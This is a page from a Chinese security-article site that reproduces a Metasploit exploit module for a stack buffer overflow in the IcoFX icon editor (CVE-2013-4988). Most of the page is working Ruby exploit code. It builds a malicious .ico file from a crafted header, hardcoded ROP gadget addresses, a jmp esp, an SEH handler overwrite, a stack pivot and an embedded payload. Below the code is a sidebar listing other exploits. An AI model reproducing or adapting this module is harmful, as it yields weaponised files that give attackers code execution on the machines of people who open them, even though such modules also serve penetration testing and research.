IcoFX 2.1 (.ico) - Stack Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

IcoFX 2.1 (.ico) - Stack Buffer Overflow

来源：metasploit.com 作者：vazquez 发布时间：2014-01-06

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})

super(update_info(info,

'Name' => 'IcoFX Stack Buffer Overflow',

'Description' => %q{

This module exploits a stack-based buffer overflow vulnerability in version 2.1

of IcoFX. The vulnerability exists while parsing .ICO files, where an specially

crafted ICONDIR header, providing an arbitrary long number of images into the file,

can be used to trigger the overflow when reading the ICONDIRENTRY structures.

},

'License' => MSF_LICENSE,

'Author' =>

[

'Marcos Accossatto', # Vulnerability discovery, poc

'juan vazquez' # Metasploit

],

'References' =>

[

[ 'CVE', '2013-4988' ],

[ 'OSVDB', '100826' ],

[ 'BID', '64221' ],

[ 'EDB', '30208'],

[ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ]

],

'Platform' => [ 'win' ],

'Payload' =>

{

'DisableNops' => true,

'Space' => 864,

'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

},

'Targets' =>

[

[ 'IcoFX 2.5 / Windows 7 SP1',

{

:callback => :target_win7,

}

],

'DisclosureDate' => 'Dec 10 2013',

'DefaultTarget' => 0))

register_options(

[

OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico'])

], self.class)

end

def target_win7

# All the gadgets com from IcoFX2.exe 2.5.0.0

# ICONDIR structure

ico = [0].pack("v") # Reserved. Must always be 0

ico << [1].pack("v") # Image type: 1 for icon (.ico) image

# 0x66 is enough to overwrite the local variables and, finally

# the seh handler. 0x7f00 is used to trigger an exception after

# the overflow, while the overwritten SEH handler is in use.

ico << [0x7f00].pack("v")

# ICONDIRENTRY structures 102 structures are using to overwrite

# every structure = 16 bytes

# 100 structures are used to reach the local variables

ico << rand_text(652)

ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods

ico << [0x0045cc21].pack("V") # jmp esp

ico << payload.encoded

ico << rand_text(

1600 - # 1600 = 16 ICONDIRENTRY struct size * 100

652 - # padding to align the stack pivot

80 - # rop nops size

4 - # jmp esp pointer size

payload.encoded.length

)

# The next ICONDIRENTRY allows to overwrite the interesting local variables

# on the stack

ico << [2].pack("V") # Counter (remaining bytes) saved on the stack

ico << rand_text(8) # Padding

ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler

# The next ICONDIRENTRY allows to overwrite the seh handler

ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret

ico << rand_text(0xc) # padding

return ico

end

def exploit

unless self.respond_to?(target[:callback])

fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined")

end

ico = self.send(target[:callback])

print_status("Creating '#{datastore['FILENAME']}' file...")

file_create(ico)

end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告